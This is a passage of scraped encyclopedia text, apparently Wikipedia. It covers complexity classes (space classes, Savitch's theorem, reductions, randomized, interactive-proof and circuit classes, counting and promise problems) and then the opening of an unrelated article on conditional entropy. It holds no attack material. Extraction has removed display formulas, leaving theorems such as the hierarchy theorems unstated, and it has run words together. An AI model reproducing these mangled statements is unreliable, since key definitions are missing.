thatL⊆NL⊆P{\displaystyle {\mathsf {L}}\subseteq {\mathsf {NL}}\subseteq {\mathsf {P}}}. However, it is not known whether any of these relationships is proper. The complexity classesPSPACEandNPSPACEare the space analogues toPandNP. That is,PSPACEis the class of problems solvable in polynomial space by a deterministic Turing machine andNPSPACEis the class of problems solvable in polynomial space by a nondeterministic Turing machine. More formally, While it is not known whetherP=NP,Savitch's theoremfamously showed thatPSPACE=NPSPACE. It is also known thatP⊆PSPACE{\displaystyle {\mathsf {P}}\subseteq {\mathsf {PSPACE}}}, which follows intuitively from the fact that, since writing to a cell on a Turing machine's tape is defined as taking one unit of time, a Turing machine operating in polynomial time can only write to polynomially many cells. It is suspected thatPis strictly smaller thanPSPACE, but this has not been proven. The complexity classesEXPSPACEandNEXPSPACEare the space analogues toEXPTIMEandNEXPTIME. That is,EXPSPACEis the class of problems solvable in exponential space by a deterministic Turing machine andNEXPSPACEis the class of problems solvable in exponential space by a nondeterministic Turing machine. Or more formally, Savitch's theoremshowed thatEXPSPACE=NEXPSPACE. This class is extremely broad: it is known to be a strict superset ofPSPACE,NP, andP, and is believed to be a strict superset ofEXPTIME. Complexity classes have a variety ofclosureproperties. For example, decision classes may be closed undernegation,disjunction,conjunction, or even under allBoolean operations. Moreover, they might also be closed under a variety of quantification schemes.P, for instance, is closed under all Boolean operations, and under quantification over polynomially sized domains. Closure properties can be helpful in separating classes—one possible route to separating two complexity classes is to find some closure property possessed by one class but not by the other. Each classXthat is not closed under negation has a complement classco-X, which consists of the complements of the languages contained inX(i.e.co-X={L|L¯∈X}{\displaystyle {\textsf {co-X}}=\{L|{\overline {L}}\in {\mathsf {X}}\}}).co-NP, for instance, is one important complement complexity class, and sits at the center of the unsolved problem over whetherco-NP=NP. Closure properties are one of the key reasons many complexity classes are defined in the way that they are.[11]Take, for example, a problem that can be solved inO(n){\displaystyle O(n)}time (that is, in linear time) and one that can be solved in, at best,O(n1000){\displaystyle O(n^{1000})}time. Both of these problems are inP, yet the runtime of the second grows considerably faster than the runtime of the first as the input size increases. One might ask whether it would be better to define the class of "efficiently solvable" problems using some smaller polynomial bound, likeO(n3){\displaystyle O(n^{3})}, rather than all polynomials, which allows for such large discrepancies. It turns out, however, that the set of all polynomials is the smallest class of functions containing the linear functions that is also closed under addition, multiplication, and composition (for instance,O(n3)∘O(n2)=O(n6){\displaystyle O(n^{3})\circ O(n^{2})=O(n^{6})}, which is a polynomial butO(n6)>O(n3){\displaystyle O(n^{6})>O(n^{3})}).[11]Since we would like composing one efficient algorithm with another efficient algorithm to still be considered efficient, the polynomials are the smallest class that ensures composition of "efficient algorithms".[12](Note that the definition ofPis also useful because, empirically, almost all problems inPthat are practically useful do in fact have low order polynomial runtimes, and almost all problems outside ofPthat are practically useful do not have any known algorithms with small exponential runtimes, i.e. withO(cn){\displaystyle O(c^{n})}runtimes wherecis close to 1.[13]) Many complexity classes are defined using the concept of areduction. A reduction is a transformation of one problem into another problem, i.e. a reduction takes inputs from one problem and transforms them into inputs of another problem. For instance, you can reduce ordinary base-10 additionx+y{\displaystyle x+y}to base-2 addition by transformingx{\displaystyle x}andy{\displaystyle y}to their base-2 notation (e.g. 5+7 becomes 101+111). Formally, a problemX{\displaystyle X}reduces to a problemY{\displaystyle Y}if there exists a functionf{\displaystyle f}such that for everyx∈Σ∗{\displaystyle x\in \Sigma ^{*}},x∈X{\displaystyle x\in X}if and only iff(x)∈Y{\displaystyle f(x)\in Y}. Generally, reductions are used to capture the notion of a problem being at least as difficult as another problem. Thus we are generally interested in using a polynomial-time reduction, since any problemX{\displaystyle X}that can be efficiently reduced to another problemY{\displaystyle Y}is no more difficult thanY{\displaystyle Y}. Formally, a problemX{\displaystyle X}is polynomial-time reducible to a problemY{\displaystyle Y}if there exists apolynomial-timecomputable functionp{\displaystyle p}such that for allx∈Σ∗{\displaystyle x\in \Sigma ^{*}},x∈X{\displaystyle x\in X}if and only ifp(x)∈Y{\displaystyle p(x)\in Y}. Note that reductions can be defined in many different ways. Common reductions areCook reductions,Karp reductionsandLevin reductions, and can vary based on resource bounds, such aspolynomial-time reductionsandlog-space reductions. Reductions motivate the concept of a problem beinghardfor a complexity class. A problemX{\displaystyle X}is hard for a class of problemsCif every problem inCcan be polynomial-time reduced toX{\displaystyle X}. Thus no problem inCis harder thanX{\displaystyle X}, since an algorithm forX{\displaystyle X}allows us to solve any problem inCwith at most polynomial slowdown. Of particular importance, the set of problems that are hard forNPis called the set ofNP-hardproblems. If a problemX{\displaystyle X}is hard forCand is also inC, thenX{\displaystyle X}is said to becompleteforC. This means thatX{\displaystyle X}is the hardest problem inC(since there could be many problems that are equally hard, more preciselyX{\displaystyle X}is as hard as the hardest problems inC). Of particular importance is the class ofNP-completeproblems—the most difficult problems inNP. Because all problems inNPcan be polynomial-time reduced toNP-complete problems, finding anNP-complete problem that can be solved in polynomial time would mean thatP=NP. Savitch's theorem establishes the relationship between deterministic and nondetermistic space resources. It shows that if a nondeterministic Turing machine can solve a problem usingf(n){\displaystyle f(n)}space, then a deterministic Turing machine can solve the same problem inf(n)2{\displaystyle f(n)^{2}}space, i.e. in the square of the space. Formally, Savitch's theorem states that for anyf(n)>n{\displaystyle f(n)>n},[14] Important corollaries of Savitch's theorem are thatPSPACE=NPSPACE(since the square of a polynomial is still a polynomial) andEXPSPACE=NEXPSPACE(since the square of an exponential is still an exponential). These relationships answer fundamental questions about the power of nondeterminism compared to determinism. Specifically, Savitch's theorem shows that any problem that a nondeterministic Turing machine can solve in polynomial space, a deterministic Turing machine can also solve in polynomial space. Similarly, any problem that a nondeterministic Turing machine can solve in exponential space, a deterministic Turing machine can also solve in exponential space. By definition ofDTIME, it follows thatDTIME(nk1){\displaystyle {\mathsf {DTIME}}(n^{k_{1}})}is contained inDTIME(nk2){\displaystyle {\mathsf {DTIME}}(n^{k_{2}})}ifk1≤k2{\displaystyle k_{1}\leq k_{2}}, sinceO(nk1)⊆O(nk2){\displaystyle O(n^{k_{1}})\subseteq O(n^{k_{2}})}ifk1≤k2{\displaystyle k_{1}\leq k_{2}}. However, this definition gives no indication of whether this inclusion is strict. For time and space requirements, the conditions under which the inclusion is strict are given by the time and space hierarchy theorems, respectively. They are called hierarchy theorems because they induce a proper hierarchy on the classes defined by constraining the respective resources. The hierarchy theorems enable one to make quantitative statements about how much more additional time or space is needed in order to increase the number of problems that can be solved. Thetime hierarchy theoremstates that Thespace hierarchy theoremstates that The time and space hierarchy theorems form the basis for most separation results of complexity classes. For instance, the time hierarchy theorem establishes thatPis strictly contained inEXPTIME, and the space hierarchy theorem establishes thatLis strictly contained inPSPACE. While deterministic and non-deterministicTuring machinesare the most commonly used models of computation, many complexity classes are defined in terms of other computational models. In particular, These are explained in greater detail below. A number of important complexity classes are defined using theprobabilistic Turing machine, a variant of theTuring machinethat can toss random coins. These classes help to better describe the complexity ofrandomized algorithms. A probabilistic Turing machine is similar to a deterministic Turing machine, except rather than following a single transition function (a set of rules for how to proceed at each step of the computation) it probabilistically selects between multiple transition functions at each step. The standard definition of a probabilistic Turing machine specifies two transition functions, so that the selection of transition function at each step resembles a coin flip. The randomness introduced at each step of the computation introduces the potential for error; that is, strings that the Turing machine is meant to accept may on some occasions be rejected and strings that the Turing machine is meant to reject may on some occasions be accepted. As a result, the complexity classes based on the probabilistic Turing machine are defined in large part around the amount of error that is allowed. Formally, they are defined using an error probabilityϵ{\displaystyle \epsilon }. A probabilistic Turing machineM{\displaystyle M}is said to recognize a languageL{\displaystyle L}with error probabilityϵ{\displaystyle \epsilon }if: The fundamental randomized time complexity classes areZPP,RP,co-RP,BPP, andPP. The strictest class isZPP(zero-error probabilistic polynomial time), the class of problems solvable in polynomial time by a probabilistic Turing machine with error probability 0. Intuitively, this is the strictest class of probabilistic problems because it demandsno error whatsoever. A slightly looser class isRP(randomized polynomial time), which maintains no error for strings not in the language but allows bounded error for strings in the language. More formally, a language is inRPif there is a probabilistic polynomial-time Turing machineM{\displaystyle M}such that if a string is not in the language thenM{\displaystyle M}always rejects and if a string is in the language thenM{\displaystyle M}accepts with a probability at least 1/2. The classco-RPis similarly defined except the roles are flipped: error is not allowed for strings in the language but is allowed for strings not in the language. Taken together, the classesRPandco-RPencompass all of the problems that can be solved by probabilistic Turing machines withone-sided error. Loosening the error requirements further to allow fortwo-sided erroryields the classBPP(bounded-error probabilistic polynomial time), the class of problems solvable in polynomial time by a probabilistic Turing machine with error probability less than 1/3 (for both strings in the language and not in the language).BPPis the most practically relevant of the probabilistic complexity classes—problems inBPPhave efficientrandomized algorithmsthat can be run quickly on real computers.BPPis also at the center of the important unsolved problem in computer science over whetherP=BPP, which if true would mean that randomness does not increase the computational power of computers, i.e. any probabilistic Turing machine could be simulated by a deterministic Turing machine with at most polynomial slowdown. The broadest class of efficiently-solvable probabilistic problems isPP(probabilistic polynomial time), the set of languages solvable by a probabilistic Turing machine in polynomial time with an error probability of less than 1/2 for all strings. ZPP,RPandco-RPare all subsets ofBPP, which in turn is a subset ofPP. The reason for this is intuitive: the classes allowing zero error and only one-sided error are all contained within the class that allows two-sided error, andPPsimply relaxes the error probability ofBPP.ZPPrelates toRPandco-RPin the following way:ZPP=RP∩co-RP{\displaystyle {\textsf {ZPP}}={\textsf {RP}}\cap {\textsf {co-RP}}}. That is,ZPPconsists exactly of those problems that are in bothRPandco-RP. Intuitively, this follows from the fact thatRPandco-RPallow only one-sided error:co-RPdoes not allow error for strings in the language andRPdoes not allow error for strings not in the language. Hence, if a problem is in bothRPandco-RP, then there must be no error for strings both inandnot in the language (i.e. no error whatsoever), which is exactly the definition ofZPP. Important randomized space complexity classes includeBPL,RL, andRLP. A number of complexity classes are defined usinginteractive proof systems. Interactive proofs generalize the proofs definition of the complexity classNPand yield insights intocryptography,approximation algorithms, andformal verification. Interactive proof systems areabstract machinesthat model computation as the exchange of messages between two parties: a proverP{\displaystyle P}and a verifierV{\displaystyle V}. The parties interact by exchanging messages, and an input string is accepted by the system if the verifier decides to accept the input on the basis of the messages it has received from the prover. The proverP{\displaystyle P}has unlimited computational power while the verifier has bounded computational power (the standard definition of interactive proof systems defines the verifier to be polynomially-time bounded). The prover, however, is untrustworthy (this prevents all languages from being trivially recognized by the proof system by having the computationally unbounded prover solve for whether a string is in a language and then sending a trustworthy "YES" or "NO" to the verifier), so the verifier must conduct an "interrogation" of the prover by "asking it" successive rounds of questions, accepting only if it develops a high degree of confidence that the string is in the language.[15] The classNPis a simple proof system in which the verifier is restricted to being a deterministic polynomial-timeTuring machineand the procedure is restricted to one round (that is, the prover sends only a single, full proof—typically referred to as thecertificate—to the verifier). Put another way, in the definition of the classNP(the set of decision problems for which the problem instances, when the answer is "YES", have proofs verifiable in polynomial time by a deterministic Turing machine) is a proof system in which the proof is constructed by an unmentioned prover and the deterministic Turing machine is the verifier. For this reason,NPcan also be calleddIP(deterministic interactive proof), though it is rarely referred to as such. It turns out thatNPcaptures the full power of interactive proof systems with deterministic (polynomial-time) verifiers because it can be shown that for any proof system with a deterministic verifier it is never necessary to need more than a single round of messaging between the prover and the verifier. Interactive proof systems that provide greater computational power over standard complexity classes thus requireprobabilisticverifiers, which means that the verifier's questions to the prover are computed usingprobabilistic algorithms. As noted in the section above onrandomized computation, probabilistic algorithms introduce error into the system, so complexity classes based on probabilistic proof systems are defined in terms of an error probabilityϵ{\displaystyle \epsilon }. The most general complexity class arising out of this characterization is the classIP(interactive polynomial time), which is the class of all problems solvable by an interactive proof system(P,V){\displaystyle (P,V)}, whereV{\displaystyle V}is probabilistic polynomial-time and the proof system satisfies two properties: for a languageL∈IP{\displaystyle L\in {\mathsf {IP}}} An important feature ofIPis that it equalsPSPACE. In other words, any problem that can be solved by a polynomial-time interactive proof system can also be solved by adeterministic Turing machinewith polynomial space resources, and vice versa. A modification of the protocol forIPproduces another important complexity class:AM(Arthur–Merlin protocol). In the definition of interactive proof systems used byIP, the prover was not able to see the coins utilized by the verifier in its probabilistic computation—it was only able to see the messages that the verifier produced with these coins. For this reason, the coins are calledprivate random coins. The interactive proof system can be constrained so that the coins used by the verifier arepublic random coins; that is, the prover is able to see the coins. Formally,AMis defined as the class of languages with an interactive proof in which the verifier sends a random string to the prover, the prover responds with a message, and the verifier either accepts or rejects by applying a deterministic polynomial-time function to the message from the prover.AMcan be generalized toAM[k], wherekis the number of messages exchanged (so in the generalized form the standardAMdefined above isAM[2]). However, it is the case that for allk≥2{\displaystyle k\geq 2},AM[k]=AM[2]. It is also the case thatAM[k]⊆IP[k]{\displaystyle {\mathsf {AM}}[k]\subseteq {\mathsf {IP}}[k]}. Other complexity classes defined using interactive proof systems includeMIP(multiprover interactive polynomial time) andQIP(quantum interactive polynomial time). An alternative model of computation to theTuring machineis theBoolean circuit, a simplified model of thedigital circuitsused in moderncomputers. Not only does this model provide an intuitive connection between computation in theory and computation in practice, but it is also a natural model fornon-uniform computation(computation in which different input sizes within the same problem use different algorithms). Formally, a Boolean circuitC{\displaystyle C}is adirected acyclic graphin which edges represent wires (which carry thebitvalues 0 and 1), the input bits are represented by source vertices (vertices with no incoming edges), and all non-source vertices representlogic gates(generally theAND,OR, andNOT gates). One logic gate is designated the output gate, and represents the end of the computation. The input/output behavior of a circuitC{\displaystyle C}withn{\displaystyle n}input variables is represented by theBoolean functionfC:{0,1}n→{0,1}{\displaystyle f_{C}:\{0,1\}^{n}\to \{0,1\}}; for example, on input bitsx1,x2,...,xn{\displaystyle x_{1},x_{2},...,x_{n}}, the output bitb{\displaystyle b}of the circuit is represented mathematically asb=fC(x1,x2,...,xn){\displaystyle b=f_{C}(x_{1},x_{2},...,x_{n})}. The circuitC{\displaystyle C}is said tocomputethe Boolean functionfC{\displaystyle f_{C}}. Any particular circuit has a fixed number of input vertices, so it can only act on inputs of that size.Languages(the formal representations ofdecision problems), however, contain strings of differing lengths, so languages cannot be fully captured by a single circuit (this contrasts with the Turing machine model, in which a language is fully described by a single Turing machine that can act on any input size). A language is thus represented by acircuit family. A circuit family is an infinite list of circuits(C0,C1,C2,...){\displaystyle (C_{0},C_{1},C_{2},...)}, whereCn{\displaystyle C_{n}}is a circuit withn{\displaystyle n}input variables. A circuit family is said to decide a languageL{\displaystyle L}if, for every stringw{\displaystyle w},w{\displaystyle w}is in the languageL{\displaystyle L}if and only ifCn(w)=1{\displaystyle C_{n}(w)=1}, wheren{\displaystyle n}is the length ofw{\displaystyle w}. In other words, a stringw{\displaystyle w}of sizen{\displaystyle n}is in the language represented by the circuit family(C0,C1,C2,...){\displaystyle (C_{0},C_{1},C_{2},...)}if the circuitCn{\displaystyle C_{n}}(the circuit with the same number of input vertices as the number of bits inw{\displaystyle w}) evaluates to 1 whenw{\displaystyle w}is its input. While complexity classes defined using Turing machines are described in terms oftime complexity, circuit complexity classes are defined in terms of circuit size — the number of vertices in the circuit. The size complexity of a circuit family(C0,C1,C2,...){\displaystyle (C_{0},C_{1},C_{2},...)}is the functionf:N→N{\displaystyle f:\mathbb {N} \to \mathbb {N} }, wheref(n){\displaystyle f(n)}is the circuit size ofCn{\displaystyle C_{n}}. The familiar function classes follow naturally from this; for example, a polynomial-size circuit family is one such that the functionf{\displaystyle f}is apolynomial. The complexity classP/polyis the set of languages that are decidable by polynomial-size circuit families. It turns out that there is a natural connection between circuit complexity and time complexity. Intuitively, a language with small time complexity (that is, requires relatively few sequential operations on a Turing machine), also has a small circuit complexity (that is, requires relatively few Boolean operations). Formally, it can be shown that if a language is inDTIME(t(n)){\displaystyle {\mathsf {DTIME}}(t(n))}, wheret{\displaystyle t}is a functiont:N→N{\displaystyle t:\mathbb {N} \to \mathbb {N} }, then it has circuit complexityO(t2(n)){\displaystyle O(t^{2}(n))}.[16]It follows directly from this fact thatP⊂P/poly{\displaystyle {\mathsf {\color {Blue}P}}\subset {\textsf {P/poly}}}. In other words, any problem that can be solved in polynomial time by a deterministic Turing machine can also be solved by a polynomial-size circuit family. It is further the case that the inclusion is proper, i.e.P⊊P/poly{\displaystyle {\textsf {P}}\subsetneq {\textsf {P/poly}}}(for example, there are someundecidable problemsthat are inP/poly). P/polyhas a number of properties that make it highly useful in the study of the relationships between complexity classes. In particular, it is helpful in investigating problems related toPversusNP. For example, if there is any language inNPthat is not inP/poly, thenP≠NP{\displaystyle {\mathsf {P}}\neq {\mathsf {NP}}}.[17]P/polyis also helpful in investigating properties of thepolynomial hierarchy. For example, ifNP⊆P/poly, thenPHcollapses toΣ2P{\displaystyle \Sigma _{2}^{\mathsf {P}}}. A full description of the relations betweenP/polyand other complexity classes is available at "Importance of P/poly".P/polyis also helpful in the general study of the properties ofTuring machines, as the class can be equivalently defined as the class of languages recognized by a polynomial-time Turing machine with a polynomial-boundedadvice function. Two subclasses ofP/polythat have interesting properties in their own right areNCandAC. These classes are defined not only in terms of their circuit size but also in terms of theirdepth. The depth of a circuit is the length of the longestdirected pathfrom an input node to the output node. The classNCis the set of languages that can be solved by circuit families that are restricted not only to having polynomial-size but also to having polylogarithmic depth. The classACis defined similarly toNC, however gates are allowed to have unbounded fan-in (that is, the AND and OR gates can be applied to more than two bits).NCis a notable class because it can be equivalently defined as the class of languages that have efficientparallel algorithms. The classesBQPandQMA, which are of key importance inquantum information science, are defined usingquantum Turing machines. While most complexity classes studied by computer scientists are sets ofdecision problems, there are also a number of complexity classes defined in terms of other types of problems. In particular, there are complexity classes consisting ofcounting problems,function problems, andpromise problems. These are explained in greater detail below. Acounting problemasks not onlywhethera solution exists (as with adecision problem), but askshow manysolutions exist.[18]For example, the decision problemCYCLE{\displaystyle {\texttt {CYCLE}}}askswhethera particular graphG{\displaystyle G}has asimple cycle(the answer is a simple yes/no); the corresponding counting problem#CYCLE{\displaystyle \#{\texttt {CYCLE}}}(pronounced "sharp cycle") askshow manysimple cyclesG{\displaystyle G}has.[19]The output to a counting problem is thus a number, in contrast to the output for a decision problem, which is a simple yes/no (or accept/reject, 0/1, or other equivalent scheme).[20] Thus, whereas decision problems are represented mathematically asformal languages, counting problems are represented mathematically asfunctions: a counting problem is formalized as the functionf:{0,1}∗→N{\displaystyle f:\{0,1\}^{*}\to \mathbb {N} }such that for every inputw∈{0,1}∗{\displaystyle w\in \{0,1\}^{*}},f(w){\displaystyle f(w)}is the number of solutions. For example, in the#CYCLE{\displaystyle \#{\texttt {CYCLE}}}problem, the input is a graphG∈{0,1}∗{\displaystyle G\in \{0,1\}^{*}}(a graph represented as a string ofbits) andf(G){\displaystyle f(G)}is the number of simple cycles inG{\displaystyle G}. Counting problems arise in a number of fields, includingstatistical estimation,statistical physics,network design, andeconomics.[21] #P(pronounced "sharp P") is an important class of counting problems that can be thought of as the counting version ofNP.[22]The connection toNParises from the fact that the number of solutions to a problem equals the number of accepting branches in anondeterministic Turing machine's computation tree.#Pis thus formally defined as follows: And just asNPcan be defined both in terms of nondeterminism and in terms of a verifier (i.e. as aninteractive proof system), so too can#Pbe equivalently defined in terms of a verifier. Recall that a decision problem is inNPif there exists a polynomial-time checkablecertificateto a given problem instance—that is,NPasks whether there exists a proof of membership (a certificate) for the input that can be checked for correctness in polynomial time. The class#Paskshow manysuch certificates exist.[22]In this context,#Pis defined as follows: Counting problems are a subset of a broader class of problems calledfunction problems. A function problem is a type of problem in which the values of afunctionf:A→B{\displaystyle f:A\to B}are computed. Formally, a function problemf{\displaystyle f}is defined as a relationR{\displaystyle R}over strings of an arbitraryalphabetΣ{\displaystyle \Sigma }: An algorithm solvesf{\displaystyle f}if for every inputx{\displaystyle x}such that there exists ay{\displaystyle y}satisfying(x,y)∈R{\displaystyle (x,y)\in R}, the algorithm produces one suchy{\displaystyle y}. This is just another way of saying thatf{\displaystyle f}is afunctionand the algorithm solvesf(x){\displaystyle f(x)}for allx∈Σ∗{\displaystyle x\in \Sigma ^{*}}. An important function complexity class isFP, the class of efficiently solvable functions.[23]More specifically,FPis the set of function problems that can be solved by adeterministic Turing machineinpolynomial time.[23]FPcan be thought of as the function problem equivalent ofP. Importantly,FPprovides some insight into both counting problems andPversusNP. If#P=FP, then the functions that determine the number of certificates for problems inNPare efficiently solvable. And since computing the number of certificates is at least as hard as determining whether a certificate exists, it must follow that if#P=FPthenP=NP(it is not known whether this holds in the reverse, i.e. whetherP=NPimplies#P=FP).[23] Just asFPis the function problem equivalent ofP,FNPis the function problem equivalent ofNP. Importantly,FP=FNPif and only ifP=NP.[24] Promise problemsare a generalization of decision problems in which the input to a problem is guaranteed ("promised") to be from a particular subset of all possible inputs. Recall that with a decision problemL⊆{0,1}∗{\displaystyle L\subseteq \{0,1\}^{*}}, an algorithmM{\displaystyle M}forL{\displaystyle L}must act (correctly) oneveryw∈{0,1}∗{\displaystyle w\in \{0,1\}^{*}}. A promise problem loosens the input requirement onM{\displaystyle M}by restricting the input to some subset of{0,1}∗{\displaystyle \{0,1\}^{*}}. Specifically, a promise problem is defined as a pair of non-intersecting sets(ΠACCEPT,ΠREJECT){\displaystyle (\Pi _{\text{ACCEPT}},\Pi _{\text{REJECT}})}, where:[25] The input to an algorithmM{\displaystyle M}for a promise problem(ΠACCEPT,ΠREJECT){\displaystyle (\Pi _{\text{ACCEPT}},\Pi _{\text{REJECT}})}is thusΠACCEPT∪ΠREJECT{\displaystyle \Pi _{\text{ACCEPT}}\cup \Pi _{\text{REJECT}}}, which is called thepromise. Strings inΠACCEPT∪ΠREJECT{\displaystyle \Pi _{\text{ACCEPT}}\cup \Pi _{\text{REJECT}}}are said tosatisfy the promise.[25]By definition,ΠACCEPT{\displaystyle \Pi _{\text{ACCEPT}}}andΠREJECT{\displaystyle \Pi _{\text{REJECT}}}must be disjoint, i.e.ΠACCEPT∩ΠREJECT=∅{\displaystyle \Pi _{\text{ACCEPT}}\cap \Pi _{\text{REJECT}}=\emptyset }. Within this formulation, it can be seen that decision problems are just the subset of promise problems with the trivial promiseΠACCEPT∪ΠREJECT={0,1}∗{\displaystyle \Pi _{\text{ACCEPT}}\cup \Pi _{\text{REJECT}}=\{0,1\}^{*}}. With decision problems it is thus simpler to simply define the problem as onlyΠACCEPT{\displaystyle \Pi _{\text{ACCEPT}}}(withΠREJECT{\displaystyle \Pi _{\text{REJECT}}}implicitly being{0,1}∗/ΠACCEPT{\displaystyle \{0,1\}^{*}/\Pi _{\text{ACCEPT}}}), which throughout this page is denotedL{\displaystyle L}to emphasize thatΠACCEPT=L{\displaystyle \Pi _{\text{ACCEPT}}=L}is aformal language. Promise problems make for a more natural formulation of many computational problems. For instance, a computational problem could be something like "given aplanar graph, determine whether or not..."[26]This is often stated as a decision problem, where it is assumed that there is some translation schema that takeseverystrings∈{0,1}∗{\displaystyle s\in \{0,1\}^{*}}to a planar graph. However, it is more straightforward to define this as a promise problem in which the input is promised to be a planar graph. Promise problems provide an alternate definition for standard complexity classes of decision problems.P, for instance, can be defined as a promise problem:[27] Classes of decision problems—that is, classes of problems defined as formal languages—thus translate naturally to promise problems, where a languageL{\displaystyle L}in the class is simplyL=ΠACCEPT{\displaystyle L=\Pi _{\text{ACCEPT}}}andΠREJECT{\displaystyle \Pi _{\text{REJECT}}}is implicitly{0,1}∗/ΠACCEPT{\displaystyle \{0,1\}^{*}/\Pi _{\text{ACCEPT}}}. Formulating many basic complexity classes likePas promise problems provides little additional insight into their nature. However, there are some complexity classes for which formulating them as promise problems have been useful to computer scientists. Promise problems have, for instance, played a key role in the study ofSZK(statistical zero-knowledge).[28] The following table shows some of the classes of problems that are considered in complexity theory. If classXis a strictsubsetofY, thenXis shown belowYwith a dark line connecting them. IfXis a subset, but it is unknown whether they are equal sets, then the line is lighter and dotted. Technically, the breakdown into decidable and undecidable pertains more to the study ofcomputability theory, but is useful for putting the complexity classes in perspective.
https://en.wikipedia.org/wiki/Complexity_class#NP_and_co-NP
Ininformation theory, theconditional entropyquantifies the amount of information needed to describe the outcome of arandom variableY{\displaystyle Y}given that the value of another random variableX{\displaystyle X}is known. Here, information is measured inshannons,nats, orhartleys. Theentropy ofY{\displaystyle Y}conditioned onX{\displaystyle X}is written asH(Y|X){\displaystyle \mathrm {H} (Y|X)}. The conditional entropy ofY{\displaystyle Y}givenX{\displaystyle X}is defined as whereX{\displaystyle {\mathcal {X}}}andY{\displaystyle {\mathcal {Y}}}denote thesupport setsofX{\displaystyle X}andY{\displaystyle Y}. Note:Here, the convention is that the expression0log⁡0{\displaystyle 0\log 0}should be treated as being equal to zero. This is becauselimθ→0+θlog⁡θ=0{\displaystyle \lim _{\theta \to 0^{+}}\theta \,\log \theta =0}.[1] Intuitively, notice that by definition ofexpected valueand ofconditional probability,H(Y|X){\displaystyle \displaystyle H(Y|X)}can be written asH(Y|X)=E[f(X,Y)]{\displaystyle H(Y|X)=\mathbb {E} [f(X,Y)]}, wheref{\displaystyle f}is defined asf(x,y):=−log⁡(p(x,y)p(x))=−log⁡(p(y|x)){\displaystyle \displaystyle f(x,y):=-\log \left({\frac {p(x,y)}{p(x)}}\right)=-\log(p(y|x))}. One can think off{\displaystyle \displaystyle f}as associating each pair(x,y){\displaystyle \displaystyle (x,y)}with a quantity measuring the information content of(Y=y){\displaystyle \displaystyle (Y=y)}given(X=x){\displaystyle \displaystyle (X=x)}. This quantity is directly related to the amount of information needed to describe the event(Y=y){\displaystyle \displaystyle (Y=y)}given(X=x){\displaystyle (X=x)}. Hence by computing the expected value off{\displaystyle \displaystyle f}over all pairs of values(x,y)∈X×Y{\displaystyle (x,y)\in {\mathcal {X}}\times {\mathcal {Y}}}, the conditional entropyH(Y|X){\displaystyle \displaystyle H(Y|X)}measures how much information, on average, the variableX{\displaystyle X}encodes aboutY{\displaystyle Y}. LetH(Y|X=x){\displaystyle \mathrm {H} (Y|X=x)}be theentropyof the discrete random variableY{\displaystyle Y}conditioned on the discrete random variableX{\displaystyle X}taking a certain valuex{\displaystyle x}. Denote the support sets ofX{\displaystyle X}andY{\displaystyle Y}byX{\displaystyle {\mathcal {X}}}andY{\displaystyle {\mathcal {Y}}}. LetY{\displaystyle Y}haveprobability mass functionpY(y){\displaystyle p_{Y}{(y)}}. The unconditional entropy ofY{\displaystyle Y}is calculated asH(Y):=E[I⁡(Y)]{\displaystyle \mathrm {H} (Y):=\mathbb {E} [\operatorname {I} (Y)]}, i.e. whereI⁡(yi){\displaystyle \operatorname {I} (y_{i})}is theinformation contentof theoutcomeofY{\displaystyle Y}taking the valueyi{\displaystyle y_{i}}. The entropy ofY{\displaystyle Y}conditioned onX{\displaystyle X}taking the valuex{\displaystyle x}is defined by: Note thatH(Y|X){\displaystyle \mathrm {H} (Y|X)}is the result of averagingH(Y|X=x){\displaystyle \mathrm {H} (Y|X=x)}over all possible valuesx{\displaystyle x}thatX{\displaystyle X}may take. Also, if the above sum is taken over a sampley1,…,yn{\displaystyle y_{1},\dots ,y_{n}}, the expected valueEX[H(y1,…,yn∣X=x)]{\displaystyle E_{X}[\mathrm {H} (y_{1},\dots ,y_{n}\mid X=x)]}is known in some domains asequivocation.[2] Givendiscrete random variablesX{\displaystyle X}with imageX{\displaystyle {\mathcal {X}}}andY{\displaystyle Y}with imageY{\displaystyle {\mathcal {Y}}}, the conditional entropy ofY{\displaystyle Y}givenX{\displaystyle X}is defined as the weighted sum ofH(Y|X=x){\displaystyle \mathrm {H} (Y|X=x)}for each possible value ofx{\displaystyle x}, usingp(x){\displaystyle p(x)}as the weights:[3]: 15 Conversely,H(Y|X)=H(Y){\displaystyle \mathrm {H} (Y|X)=\mathrm {H} (Y)}if and only ifY{\displaystyle Y}andX{\displaystyle X}areindependent random variables. Assume that the combined system determined by two random variablesX{\displaystyle X}andY{\displaystyle Y}hasjoint entropyH(X,Y){\displaystyle \mathrm {H} (X,Y)}, that is, we needH(X,Y){\displaystyle \mathrm {H} (X,Y)}bits of information on average to describe its exact state. Now if we first learn the value ofX{\displaystyle X}, we have gainedH(X){\displaystyle \mathrm {H} (X)}bits of information. OnceX{\displaystyle X}is known, we only needH(X,Y)−H(X){\displaystyle \mathrm {H} (X,Y)-\mathrm {H} (X)}bits to describe the state of the whole system. This quantity is exactlyH(Y|X){\displaystyle \mathrm {H} (Y|X)}, which gives thechain ruleof conditional entropy: The chain rule follows from the above definition of conditional entropy: In general, a chain rule for multiple random variables holds: It has a similar form tochain rulein probability theory, except that addition instead of multiplication is used. Bayes' rulefor conditional entropy states Proof.H(Y|X)=H(X,Y)−H(X){\displaystyle \mathrm {H} (Y|X)=\mathrm {H} (X,Y)-\mathrm {H} (X)}andH(X|Y)=H(Y,X)−H(Y){\displaystyle \mathrm {H} (X|Y)=\mathrm {H} (Y,X)-\mathrm {H} (Y)}. Symmetry entailsH(X,Y)=H(Y,X){\displaystyle \mathrm {H} (X,Y)=\mathrm {H} (Y,X)}. Subtracting the two equations implies Bayes' rule. IfY{\displaystyle Y}isconditionally independentofZ{\displaystyle Z}givenX{\displaystyle X}we have: For anyX{\displaystyle X}andY{\displaystyle Y}: whereI⁡(X;Y){\displaystyle \operatorname {I} (X;Y)}is themutual informationbetweenX{\displaystyle X}andY{\displaystyle Y}. For independentX{\displaystyle X}andY{\displaystyle Y}: Although the specific-conditional entropyH(X|Y=y){\displaystyle \mathrm {H} (X|Y=y)}can be either less or greater thanH(X){\displaystyle \mathrm {H} (X)}for a givenrandom variatey{\displaystyle y}ofY{\displaystyle Y},H(X|Y){\displaystyle \mathrm {H} (X|Y)}can never exceedH(X){\displaystyle \mathrm {H} (X)}. The above definition is for discrete random variables. The continuous version of discrete conditional entropy is calledconditional differential (or continuous) entropy. LetX{\displaystyle X}andY{\displaystyle Y}be a continuous random variables with ajoint probability density functionf(x,y){\displaystyle f(x,y)}. The differential conditional entropyh(X|Y){\displaystyle h(X|Y)}is defined as[3]: 249 In contrast to the conditional entropy for discrete random variables, the conditional differential entropy may be negative. As in the discrete case there is a chain rule for differential entropy: Notice however that this rule may not be true 